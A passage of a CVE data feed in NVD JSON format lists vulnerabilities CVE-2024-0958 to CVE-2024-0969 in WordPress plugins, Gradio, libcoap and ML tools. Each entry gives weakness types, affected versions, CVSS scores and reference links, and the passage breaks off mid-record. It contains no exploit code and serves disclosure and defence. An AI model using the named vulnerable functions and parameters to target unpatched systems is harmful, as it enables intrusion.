"cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0958", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/drive/folders/17JTwjuT09q7he_oXkMtZS5jyyXw8ZIgg?usp=sharing", "name" : "https://drive.google.com/drive/folders/17JTwjuT09q7he_oXkMtZS5jyyXw8ZIgg?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://drive.google.com/drive/folders/17JTwjuT09q7he_oXkMtZS5jyyXw8ZIgg?usp=sharing", "name" : "https://drive.google.com/drive/folders/17JTwjuT09q7he_oXkMtZS5jyyXw8ZIgg?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252203", "name" : "https://vuldb.com/?ctiid.252203", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252203", "name" : "https://vuldb.com/?ctiid.252203", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252203", "name" : "https://vuldb.com/?id.252203", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252203", "name" : "https://vuldb.com/?id.252203", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in CodeAstro Stock Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /index.php of the component Add Category Handler. The manipulation of the argument Category Name/Category Description leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252203." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:swapnilsahu:stock_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-27T06:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0959", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/bayuncao/vul-cve-7", "name" : "https://github.com/bayuncao/vul-cve-7", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/bayuncao/vul-cve-7", "name" : "https://github.com/bayuncao/vul-cve-7", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/bayuncao/vul-cve-7/blob/main/dataset.pkl", "name" : "https://github.com/bayuncao/vul-cve-7/blob/main/dataset.pkl", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/bayuncao/vul-cve-7/blob/main/dataset.pkl", "name" : "https://github.com/bayuncao/vul-cve-7/blob/main/dataset.pkl", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.252204", "name" : "https://vuldb.com/?ctiid.252204", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.252204", "name" : "https://vuldb.com/?ctiid.252204", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.252204", "name" : "https://vuldb.com/?id.252204", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.252204", "name" : "https://vuldb.com/?id.252204", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in StanfordVL GibsonEnv 0.3.1. It has been classified as critical. Affected is the function cloudpickle.load of the file gibson\\utils\\pposgd_fuse.py. The manipulation leads to deserialization. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252204." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:standford:gibsonenv:0.3.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-27T11:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0960", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/bayuncao/vul-cve-8", "name" : "https://github.com/bayuncao/vul-cve-8", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/bayuncao/vul-cve-8", "name" : "https://github.com/bayuncao/vul-cve-8", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/bayuncao/vul-cve-8/blob/main/dataset.pkl", "name" : "https://github.com/bayuncao/vul-cve-8/blob/main/dataset.pkl", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/bayuncao/vul-cve-8/blob/main/dataset.pkl", "name" : "https://github.com/bayuncao/vul-cve-8/blob/main/dataset.pkl", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.252205", "name" : "https://vuldb.com/?ctiid.252205", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.252205", "name" : "https://vuldb.com/?ctiid.252205", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.252205", "name" : "https://vuldb.com/?id.252205", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252205", "name" : "https://vuldb.com/?id.252205", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in flink-extended ai-flow 0.3.1. It has been declared as critical. Affected by this vulnerability is the function cloudpickle.loads of the file \\ai_flow\\cli\\commands\\workflow_command.py. The manipulation leads to deserialization. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-252205 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:flink-extended:aiflow:0.3.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-27T12:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0961", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/so-widgets-bundle/trunk/widgets/button/button.php#L355", "name" : "https://plugins.trac.wordpress.org/browser/so-widgets-bundle/trunk/widgets/button/button.php#L355", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/so-widgets-bundle/trunk/widgets/button/button.php#L355", "name" : "https://plugins.trac.wordpress.org/browser/so-widgets-bundle/trunk/widgets/button/button.php#L355", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3027675%40so-widgets-bundle%2Ftrunk&old=3027506%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3027675%40so-widgets-bundle%2Ftrunk&old=3027506%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3027675%40so-widgets-bundle%2Ftrunk&old=3027506%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3027675%40so-widgets-bundle%2Ftrunk&old=3027506%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6f7c164f-2f78-4857-94b9-077c2dea13df?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6f7c164f-2f78-4857-94b9-077c2dea13df?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6f7c164f-2f78-4857-94b9-077c2dea13df?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6f7c164f-2f78-4857-94b9-077c2dea13df?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the code editor in all versions up to, and including, 1.58.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:siteorigin:siteorigin_widgets_bundle:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.58.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0962", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/obgm/libcoap/issues/1310", "name" : "https://github.com/obgm/libcoap/issues/1310", "refsource" : "", "tags" : [ "Exploit", "Patch" ] }, { "url" : "https://github.com/obgm/libcoap/issues/1310", "name" : "https://github.com/obgm/libcoap/issues/1310", "refsource" : "", "tags" : [ "Exploit", "Patch" ] }, { "url" : "https://github.com/obgm/libcoap/issues/1310#issue-2099860835", "name" : "https://github.com/obgm/libcoap/issues/1310#issue-2099860835", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking" ] }, { "url" : "https://github.com/obgm/libcoap/issues/1310#issue-2099860835", "name" : "https://github.com/obgm/libcoap/issues/1310#issue-2099860835", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking" ] }, { "url" : "https://github.com/obgm/libcoap/pull/1311", "name" : "https://github.com/obgm/libcoap/pull/1311", "refsource" : "", "tags" : [ "Issue Tracking", "Patch" ] }, { "url" : "https://github.com/obgm/libcoap/pull/1311", "name" : "https://github.com/obgm/libcoap/pull/1311", "refsource" : "", "tags" : [ "Issue Tracking", "Patch" ] }, { "url" : "https://vuldb.com/?ctiid.252206", "name" : "https://vuldb.com/?ctiid.252206", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.252206", "name" : "https://vuldb.com/?ctiid.252206", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.252206", "name" : "https://vuldb.com/?id.252206", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252206", "name" : "https://vuldb.com/?id.252206", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in obgm libcoap 4.3.4. It has been rated as critical. Affected by this issue is the function get_split_entry of the file src/coap_oscore.c of the component Configuration File Handler. The manipulation leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-252206 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:libcoap:libcoap:4.3.4:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-27T13:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0963", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3029782/calculated-fields-form/trunk/inc/cpcff_main.inc.php", "name" : "https://plugins.trac.wordpress.org/changeset/3029782/calculated-fields-form/trunk/inc/cpcff_main.inc.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3029782/calculated-fields-form/trunk/inc/cpcff_main.inc.php", "name" : "https://plugins.trac.wordpress.org/changeset/3029782/calculated-fields-form/trunk/inc/cpcff_main.inc.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029782%40calculated-fields-form&new=3029782%40calculated-fields-form&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029782%40calculated-fields-form&new=3029782%40calculated-fields-form&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029782%40calculated-fields-form&new=3029782%40calculated-fields-form&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3029782%40calculated-fields-form&new=3029782%40calculated-fields-form&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d870ff8d-ea4b-4777-9892-0d9982182b9f?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d870ff8d-ea4b-4777-9892-0d9982182b9f?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d870ff8d-ea4b-4777-9892-0d9982182b9f?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d870ff8d-ea4b-4777-9892-0d9982182b9f?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Calculated Fields Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's CP_CALCULATED_FIELDS shortcode in all versions up to, and including, 1.2.52 due to insufficient input sanitization and output escaping on user supplied 'location' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:codepeople:calculated_fields_form:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.2.52", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-02T12:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0964", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-22" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/gradio-app/gradio/commit/d76bcaaaf0734aaf49a680f94ea9d4d22a602e70", "name" : "https://github.com/gradio-app/gradio/commit/d76bcaaaf0734aaf49a680f94ea9d4d22a602e70", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/gradio-app/gradio/commit/d76bcaaaf0734aaf49a680f94ea9d4d22a602e70", "name" : "https://github.com/gradio-app/gradio/commit/d76bcaaaf0734aaf49a680f94ea9d4d22a602e70", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741", "name" : "https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741", "name" : "https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A local file include could be remotely triggered in Gradio due to a vulnerable user-supplied JSON value in an API request." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gradio_project:gradio:-:*:*:*:*:python:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "LOW", "baseScore" : 9.4, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.5 } }, "publishedDate" : "2024-02-05T23:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0965", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3030099/simple-page-access-restriction", "name" : "https://plugins.trac.wordpress.org/changeset/3030099/simple-page-access-restriction", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d99dc270-1b28-4e76-9346-38b2b96be01c?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d99dc270-1b28-4e76-9346-38b2b96be01c?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3030099/simple-page-access-restriction", "name" : "https://plugins.trac.wordpress.org/changeset/3030099/simple-page-access-restriction", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d99dc270-1b28-4e76-9346-38b2b96be01c?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d99dc270-1b28-4e76-9346-38b2b96be01c?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Simple Page Access Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.21 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's page restriction and view page content." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pluginsandsnippets:simple_page_access_restriction:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.0.21", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-08T09:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0966", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/shariff/trunk/services/shariff-info.php#L46", "name" : "https://plugins.trac.wordpress.org/browser/shariff/trunk/services/shariff-info.php#L46", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030487%40shariff&new=3030487%40shariff&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030487%40shariff&new=3030487%40shariff&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8588f9e8-441c-4b9e-bd78-8526d8c28fa3?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8588f9e8-441c-4b9e-bd78-8526d8c28fa3?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/shariff/trunk/services/shariff-info.php#L46", "name" : "https://plugins.trac.wordpress.org/browser/shariff/trunk/services/shariff-info.php#L46", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8588f9e8-441c-4b9e-bd78-8526d8c28fa3?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/8588f9e8-441c-4b9e-bd78-8526d8c28fa3?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030487%40shariff&new=3030487%40shariff&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030487%40shariff&new=3030487%40shariff&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Shariff Wrapper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shariff' shortcode in all versions up to, and including, 4.6.9 due to insufficient input sanitization and output escaping on user supplied attributes like 'info_text'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page and clicks the information icon." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:datenverwurstungszentrale:shariff_wrapper:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "4.6.10", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-03-21T02:51Z", "lastModifiedDate" : "2025-05-09T15:03Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0967", "ASSIGNER" : "security@opentext.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://portal.microfocus.com/s/article/KM000027060", "name" : "https://portal.microfocus.com/s/article/KM000027060", "refsource" : "", "tags" : [ ] }, { "url" : "https://portal.microfocus.com/s/article/KM000027060", "name" : "https://portal.microfocus.com/s/article/KM000027060", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A potential vulnerability has been identified in OpenText / Micro Focus ArcSight Enterprise Security Manager (ESM). The vulnerability could be remotely exploited." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-01T15:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0968", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority as the vulnerability is not in distributable software." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-02T22:15Z", "lastModifiedDate" : "2024-04-08T11:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0969", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3030044/armember-membership/trunk/core/classes/class.arm_restriction.php", "name" : "https://plugins.trac.wordpress.org/changeset/3030044/armember-membership/trunk/core/classes/class.arm_restriction.php", "refsource" 